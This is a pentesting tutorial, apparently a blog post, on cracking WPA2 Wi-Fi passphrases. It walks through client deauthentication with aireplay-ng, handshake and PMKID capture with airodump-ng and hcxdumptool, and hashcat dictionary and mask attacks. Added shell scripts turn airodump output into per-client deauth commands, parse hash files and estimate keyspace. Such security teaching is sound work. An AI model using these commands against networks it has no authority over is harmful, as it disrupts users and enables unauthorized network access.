Wireless Penetration Testing (WPA-2 Cracking)

Vamshi Vemula, published in InfoSec Write-ups, May 16, 2022

In this article, I’ll discuss wireless penetration testing and cracking WPA2-protected Wi-Fi. I will cover two different methods that we can use to pentest a WPA2 network. So, let’s get into the topic :)

Caution: This article is for educational purposes only. Pentest only networks that you legally own or that you have explicit permission to test.


There are two methods we can use: the first is capturing the four-way handshake with airodump-ng (after deauthenticating a client so it reconnects), and the second is using hcxdumptool, which can also obtain the PMKID directly from the access point without any client being present. In both cases we end up with a capture file that we convert into a hash file and take offline; then we crack the hash with hashcat, whose mode 22000 accepts both handshake and PMKID entries.

Prerequisites:

  1. Wi-Fi adapter that supports monitor mode (and packet injection, which the deauth step of method 1 needs).
  2. A Linux machine.
  3. airmon-ng, airodump-ng, aireplay-ng, aircrack-ng (the aircrack-ng suite, for method 1)
  4. hcxdumptool and hcxtools (for method 2)
  5. Hashcat
  6. A Wi-Fi network that you have permission to test.

1. Capturing the Four-Way Handshake (airodump-ng)

I know this is the old way to crack Wi-Fi passwords, but it still works great. In this method we capture the four-way handshake by sending deauthentication frames to a client on the network, which forces it to reconnect and re-authenticate while we are listening.

Install the required software by entering the following command

sudo apt install aircrack-ng

Start by putting the network interface into monitor mode. Type the following commands:

iwconfig
sudo airmon-ng check kill
sudo airmon-ng start wlp8s0

The check kill step stops NetworkManager and wpa_supplicant so they cannot interfere with the adapter; remember to stop monitor mode with airmon-ng and restart NetworkManager when you are finished.

Here, wlp8s0 is my network interface.

Type iwconfig again to confirm that monitor mode is enabled; the interface will usually have been renamed to wlp8s0mon.

Now we can use airodump-ng to list all Wi-Fi networks in range:

sudo airodump-ng wlp8s0mon

It displays each network’s BSSID, channel (CH), encryption and ESSID, and below that the stations it sees.

Copy the target network’s BSSID and CH.

Now start capturing on the target’s channel and BSSID only, writing the capture to disk:

sudo airodump-ng -c 6 --bssid A6:0C:ID:ID:ID:ID -w filename wlp8s0mon

Here -c 6 is the channel and --bssid the BSSID you copied above; -w filename is a file-name prefix, so the capture lands in filename-01.cap (with a matching filename-01.csv next to it).

It starts listening for a handshake and shows the stations connected to the target network in the STATION column. To capture the four-way handshake we need a client to (re)authenticate, so we send deauthentication frames to a connected client, which makes it reconnect. Open a new terminal tab and run:

sudo aireplay-ng -0 1 -a AP_BSSID -c CLIENT_MAC wlp8s0mon

Here -0 1 sends one burst of deauth frames (increase the count if no handshake appears), -a is the target AP’s BSSID and -c is the MAC of the client taken from the STATION column; without -c the deauth is broadcast to every client of the AP. Once the deauth has been sent, go back to the airodump-ng terminal: the top line should now read "WPA handshake: <BSSID>". Press Ctrl+C to stop the capture.

Now we have the capture file; because -w filename is a prefix, airodump-ng named it filename-01.cap. We can either use aircrack-ng to crack the password directly from the .cap, or convert it to hash.hc22000 and crack the hash with hashcat.

  • To crack using aircrack-ng, use the following command.
aircrack-ng -w rockyou.txt -b BSSID filename-01.cap
  • To convert the .cap to hashcat’s hash format, use the following website (the hcxpcapngtool conversion shown in method 2 also accepts .cap files, which keeps the capture off third-party servers).

https://hashcat.net/cap2hashcat/

Upload filename-01.cap on the website and download the converted hash.hc22000 file. On a client engagement, check that the rules of engagement allow uploading captures to a third-party site; the local conversion is the safer default.
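As an added example (not part of the original article), here is a small POSIX shell script that reads the CSV file airodump-ng writes next to the .cap (filename-01.csv when you pass -w filename) and pulls out exactly the two values the aireplay-ng step needs: the target’s channel and the MAC addresses of the stations currently associated with it. It then prints the capture and deauth commands from this section with those values filled in. The CSV content is constructed to follow airodump-ng’s layout; the BSSIDs, client MACs and the interface name are made-up placeholders.

```sh
#!/bin/sh
# Added example, not from the original article. Parses airodump-ng's
# CSV output (filename-01.csv) to get a target AP's channel and its
# associated clients, then prints the airodump-ng/aireplay-ng commands
# from the article with those values filled in.
#
# airodump-ng CSV layout: an AP table headed "BSSID, ..." (channel is
# column 4), a blank line, then a station table headed "Station MAC, ..."
# (associated BSSID is column 6, "(not associated)" for probing clients).

# Print the channel of the AP with the given BSSID.
airodump_channel() {
    awk -F, -v t="$2" '
        /^BSSID,/       { s = "ap";  next }
        /^Station MAC,/ { s = "sta"; next }
        s == "ap" && $1 == t { gsub(/ /, "", $4); print $4; exit }
    ' "$1"
}

# Print the MAC of every station currently associated with the BSSID.
airodump_clients() {
    awk -F, -v t="$2" '
        /^BSSID,/       { s = "ap";  next }
        /^Station MAC,/ { s = "sta"; next }
        s == "sta" { b = $6; gsub(/ /, "", b); if (b == t) print $1 }
    ' "$1"
}

# Emit the capture and deauth commands for the target on IFACE.
# Usage: plan_handshake_capture CSV BSSID IFACE
plan_handshake_capture() {
    csv=$1; bssid=$2; iface=$3
    ch=$(airodump_channel "$csv" "$bssid")
    if [ -z "$ch" ]; then
        echo "BSSID $bssid not found in $csv" >&2
        return 1
    fi
    echo "sudo airodump-ng -c $ch --bssid $bssid -w capture $iface"
    # One deauth per associated client. With no clients there is nobody
    # to deauth, so the PMKID method (hcxdumptool) is the alternative.
    airodump_clients "$csv" "$bssid" | while read -r sta; do
        echo "sudo aireplay-ng -0 1 -a $bssid -c $sta $iface"
    done
}

# Constructed sample in airodump-ng's CSV format (placeholder addresses).
write_sample_csv() {
    cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
A6:0C:11:22:33:44, 2022-05-16 10:00:01, 2022-05-16 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      100,        0,   0.  0.  0.  0,  10, TestLabNet, 
D2:7E:55:66:77:88, 2022-05-16 10:00:02, 2022-05-16 10:05:00, 11,  54, WPA2, CCMP, PSK, -71,       80,        0,   0.  0.  0.  0,   9, Neighbour, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
3C:AA:BB:CC:DD:EE, 2022-05-16 10:00:05, 2022-05-16 10:04:59, -50,       23, A6:0C:11:22:33:44, TestLabNet
7A:11:22:33:44:55, 2022-05-16 10:01:00, 2022-05-16 10:02:00, -80,        2, (not associated), 
EOF
}

# Stand-alone demo on the constructed sample.
sample=${TMPDIR:-/tmp}/airodump-sample-$$.csv
write_sample_csv "$sample"
plan_handshake_capture "$sample" A6:0C:11:22:33:44 wlp8s0mon
rm -f "$sample"
```

In a real run, point plan_handshake_capture at the filename-01.csv that your first airodump-ng scan produced and at the BSSID you copied; the printed commands are the two steps above, with the channel and client already filled in.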

2. Using hcxdumptool

This method is easier to follow, and it does not require deauthenticating a client. hcxdumptool requests the PMKID directly from the access point as part of an association attempt, so it works even when no client is connected (as long as the AP includes a PMKID in its first EAPOL message); it also records any four-way handshakes it happens to see.

Install hcxdumptool and hcxtools from the below links:

https://github.com/ZerBea/hcxdumptool

https://github.com/ZerBea/hcxtools

Once the required software is installed, follow the process.

First, stop NetworkManager and wpa_supplicant so that they do not fight hcxdumptool for control of the adapter:

sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service

Then start hcxdumptool to write a pcapng capture:

sudo hcxdumptool -i wlp8s0 -o dumpfile.pcapng --active_beacon --enable_status=15

Note that the interface here is the plain wlp8s0, not a monitor interface: hcxdumptool puts the adapter into monitor mode itself. These options are the hcxdumptool 6.2.x syntax that was current when this was written; later releases renamed the options, so check hcxdumptool --help for your version. Also be aware that by default hcxdumptool engages every network in range; on an engagement, restrict it to your target BSSID with its filter options (again, see --help).

Once it is running, wait a while for it to capture enough traffic; the status output shows when a PMKID or EAPOL handshake has been received. Then stop the process with Ctrl+C.

Now we have dumpfile.pcapng on our machine. Restart wpa_supplicant and NetworkManager:

sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.service

Next, we have to convert the .pcapng file to a crackable .hc22000 file. To do that, use hcxpcapngtool from hcxtools (the -E option also writes the ESSIDs it found to essidlist, which is a useful seed for a wordlist):

hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng

Now, we have hash.hc22000 file which can be cracked by using hashcat.
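Both methods end in the same hash.hc22000 format, and it is worth checking what actually landed in it before spending GPU time: a type 01 entry is a PMKID (the no-client capture from hcxdumptool), a type 02 entry is a captured EAPOL four-way handshake (the airodump-ng method). As an added example (not from the original article, and not part of hcxtools), this POSIX shell script parses the file’s ‘*’-separated fields and reports the type, AP MAC, client MAC and decoded ESSID of each entry. The sample lines are constructed with placeholder addresses and filler hash, nonce and EAPOL hex, so they exercise the parser but cannot be cracked.

```sh
#!/bin/sh
# Added example, not from the original article. Inspects a hashcat
# mode 22000 file to show what each capture method produced.
# hc22000 line layout (fields separated by '*'):
#   WPA*TYPE*HASH*MAC_AP*MAC_CLIENT*ESSID_HEX*ANONCE*EAPOL*MESSAGEPAIR
#   TYPE 01 = PMKID (what hcxdumptool gets from the AP, no client needed)
#   TYPE 02 = EAPOL four-way handshake (airodump-ng + deauth method)
# PMKID lines leave the last three fields empty.

# Decode a hex string (e.g. 546573744c61624e6574) to ASCII.
hex_to_ascii() {
    hex=$1; out=""
    while [ -n "$hex" ]; do
        pair=${hex%"${hex#??}"}              # first two hex digits
        hex=${hex#??}
        out="$out$(printf "\\$(printf '%03o' "0x$pair")")"
    done
    printf '%s' "$out"
}

# Field N (1-based) of an hc22000 line.
hc22000_field() { printf '%s\n' "$1" | cut -d'*' -f"$2"; }

# "PMKID", "EAPOL" or "unknown" for one line.
hc22000_kind() {
    case $(hc22000_field "$1" 2) in
        01) echo PMKID ;;
        02) echo EAPOL ;;
        *)  echo unknown ;;
    esac
}

# Number of entries of a given TYPE (01 or 02) in FILE.
# Usage: hc22000_count_type FILE TYPE
hc22000_count_type() { grep -c "^WPA\*$2\*" "$1" || true; }

# One summary line per entry (kind, AP MAC, client MAC, decoded ESSID),
# followed by a count of each type.
hc22000_report() {
    while IFS= read -r line; do
        case $line in WPA\*[0-9][0-9]\**) ;; *) continue ;; esac
        printf '%-5s ap=%s client=%s essid="%s"\n' \
            "$(hc22000_kind "$line")" \
            "$(hc22000_field "$line" 4)" \
            "$(hc22000_field "$line" 5)" \
            "$(hex_to_ascii "$(hc22000_field "$line" 6)")"
    done < "$1"
    printf 'PMKID entries: %s, EAPOL entries: %s\n' \
        "$(hc22000_count_type "$1" 01)" "$(hc22000_count_type "$1" 02)"
}

# Constructed sample (placeholder MACs; the hash, nonce and EAPOL hex are
# filler, so hashcat cannot crack them, they only exercise the parser).
# ESSID hex 546573744c61624e6574 decodes to "TestLabNet".
write_sample_hc22000() {
    cat > "$1" <<'EOF'
WPA*01*00112233445566778899aabbccddeeff*a60c11223344*3caabbccddee*546573744c61624e6574***
WPA*02*ffeeddccbbaa99887766554433221100*a60c11223344*3caabbccddee*546573744c61624e6574*0102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f20*0103007502010a00*02
EOF
}

# Stand-alone demo on the constructed sample.
sample=${TMPDIR:-/tmp}/sample-$$.hc22000
write_sample_hc22000 "$sample"
hc22000_report "$sample"
rm -f "$sample"
```

Run hc22000_report against your real hash.hc22000: if it shows only PMKID entries for a target that hcxpcapngtool could not convert cleanly, you know to go back and capture a handshake, and if the ESSID decodes to something unexpected you have picked up a neighbouring network rather than your target.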

3. Hashcat for cracking

Download the latest release of hashcat from https://hashcat.net/hashcat

  • Dictionary attack (wordlist) using hashcat.
hashcat -m 22000 hash.hc22000 rockyou.txt
  • Brute-force (mask attack) using hashcat.
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

The command above brute-forces an 8-digit numeric password; 8 characters is the minimum WPA2 passphrase length, so this is the shortest all-digit mask worth trying. For a 10-digit numeric password:

hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

You can also build a mask for a 10-digit password that starts with 9 (fixing the first character divides the keyspace by ten):

hashcat -m 22000 hash.hc22000 -a 3 9?d?d?d?d?d?d?d?d?d

To build your own mask pattern, refer to the mask attack guide from hashcat:

https://hashcat.net/wiki/doku.php?id=mask_attack
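The masks above differ enormously in cost, and WPA2 is slow per candidate because the PSK is derived with PBKDF2-HMAC-SHA1 over 4096 iterations. As an added example (not from the original article or from hashcat), this POSIX shell script computes the keyspace of a hashcat mask from hashcat’s built-in charset sizes and estimates how long it takes to exhaust at a given rate. The 500,000 H/s default is an assumed figure in the range of a single modern GPU on mode 22000; substitute the speed that hashcat -b reports for your own hardware.

```sh
#!/bin/sh
# Added example, not from the original article. Sizes a hashcat mask
# before you run it: the keyspace is the product of the charset sizes
# at each position, and WPA2 (mode 22000) is slow per guess because the
# PSK is PBKDF2-HMAC-SHA1 with 4096 iterations.

# Size of hashcat's built-in charsets.
charset_size() {
    case $1 in
        l|u) echo 26 ;;   # ?l lowercase, ?u uppercase
        d)   echo 10 ;;   # ?d digits
        h|H) echo 16 ;;   # ?h / ?H lower / upper hex
        s)   echo 33 ;;   # ?s space and punctuation
        a)   echo 95 ;;   # ?a = ?l?u?d?s
        b)   echo 256 ;;  # ?b all byte values
        *)   return 1 ;;
    esac
}

# Number of candidates a mask generates. Literal characters (such as the
# leading 9 in the article) contribute a factor of 1; "??" is a literal "?".
# Fails if the product would exceed 2^63-1 (64-bit shell arithmetic).
mask_keyspace() {
    mask=$1; total=1
    while [ -n "$mask" ]; do
        case $mask in
            \?\?*) n=1; mask=${mask#??} ;;
            \?*)
                rest=${mask#?}
                c=${rest%"${rest#?}"}        # the charset letter after '?'
                n=$(charset_size "$c") || { echo "unknown charset ?$c" >&2; return 1; }
                mask=${mask#??}
                ;;
            *) n=1; mask=${mask#?} ;;
        esac
        if [ $((total > 9223372036854775807 / n)) -eq 1 ]; then
            echo "keyspace exceeds 2^63-1" >&2
            return 1
        fi
        total=$((total * n))
    done
    echo "$total"
}

# Hours to exhaust MASK at RATE hashes per second (floating point via awk).
# Usage: mask_eta_hours MASK RATE
mask_eta_hours() {
    ks=$(mask_keyspace "$1") || return 1
    awk -v k="$ks" -v r="$2" 'BEGIN { printf "%.2f\n", k / r / 3600 }'
}

# Stand-alone demo: the article's masks plus one alphabetic mask.
# RATE is assumed (roughly one mid-range GPU on mode 22000).
rate=${RATE:-500000}
for m in '?d?d?d?d?d?d?d?d' '?d?d?d?d?d?d?d?d?d?d' '9?d?d?d?d?d?d?d?d?d' '?l?l?l?l?l?l?l?l'; do
    printf '%-22s keyspace=%-16s eta=%s h at %s H/s\n' \
        "$m" "$(mask_keyspace "$m")" "$(mask_eta_hours "$m" "$rate")" "$rate"
done
```

The numbers make the trade-off concrete: the 8-digit mask is a few minutes, the 10-digit mask is hours, and eight lowercase letters (26^8) is already days at the same rate, which is why a wordlist such as rockyou.txt or an ESSID-seeded list is usually tried first.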

Thank you for reading my article. I hope this is useful for you.
